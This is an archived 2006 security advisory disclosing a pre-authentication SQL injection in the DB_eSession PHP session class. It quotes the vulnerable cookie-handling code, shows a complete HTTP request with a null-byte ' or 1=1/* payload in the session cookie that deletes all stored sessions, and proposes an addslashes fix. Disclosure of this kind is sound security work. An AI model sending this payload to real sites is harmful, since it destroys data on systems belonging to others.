<<< Date Index >>>     <<< Thread Index >>>

DB_eSession deleteSession() SQL injection



##########################################################
# GulfTech Security Research            February 11, 2006
##########################################################
# Vendor : Lawrence Osiris
# URL : http://www.phpclasses.org/browse/package/1624.html
# Version : DB_eSession 1.0.2
# Risk : SQL Injection
##########################################################


Description:
DB_eSession is a feature-packed PHP class that stores the
session data in a MySQL database rather than files. It is
powerful, designed with security in mind, and is easy to
utilize. The DB_eSession library is used in a number of
popular web applications, and private projects alike.
DB_eSession is vulnerable to SQL Injection attacks due to
unsafe use of cookie data in an SQL query, and can allow an
attacker to craft malicious SQL Queries and have them then
successfully executed.



SQL Injection:
There is an SQL injection vulnerability in DB_eSession that
allow for an attacker to perform pre authentication SQL
Injection attacks against the vulnerable web application.

/**
* Try and save the current session ID if one is defined already.
*/
if (isSet($_COOKIE[$this->_sess_name]))
   $_sess_id_set = $_COOKIE[$this->_sess_name];
else
if (isSet($GLOBALS[$this->_sess_name]))
   $_sess_id_set = $GLOBALS[$this->_sess_name];
else
   $_sess_id_set = NULL;

The above code is from DB_eSession class @ lines 1080 - 1090
The variable $this->_sess_name is in most cases PHPSESSID, or
set to a developer specified value. You should be able to tell
from having a look at your cookies.

GET /example/index.php HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=143263645564654563456345634563435%00' or 1=1/*

The above request would successfully delete all of the sessions
in the database. The reason for the null byte is to get past
having the application die @ line 1134. Depending on what the
version of MySQL in use is, other attacks may be possible. The
root of this problem is that unsafe data is taken from a cookie
value and then passed to the deleteSession() function where it
is then used in an SQL query.



Solution:
The vendor was unresponsive to my contact attempts, but a fix is
not too difficult @ line 1092 add the following code below the
code shown @1080-1090

$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);

This should effectively stop any SQL Injection attacks against the
vulnerable DB_eSession class.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00099-02112006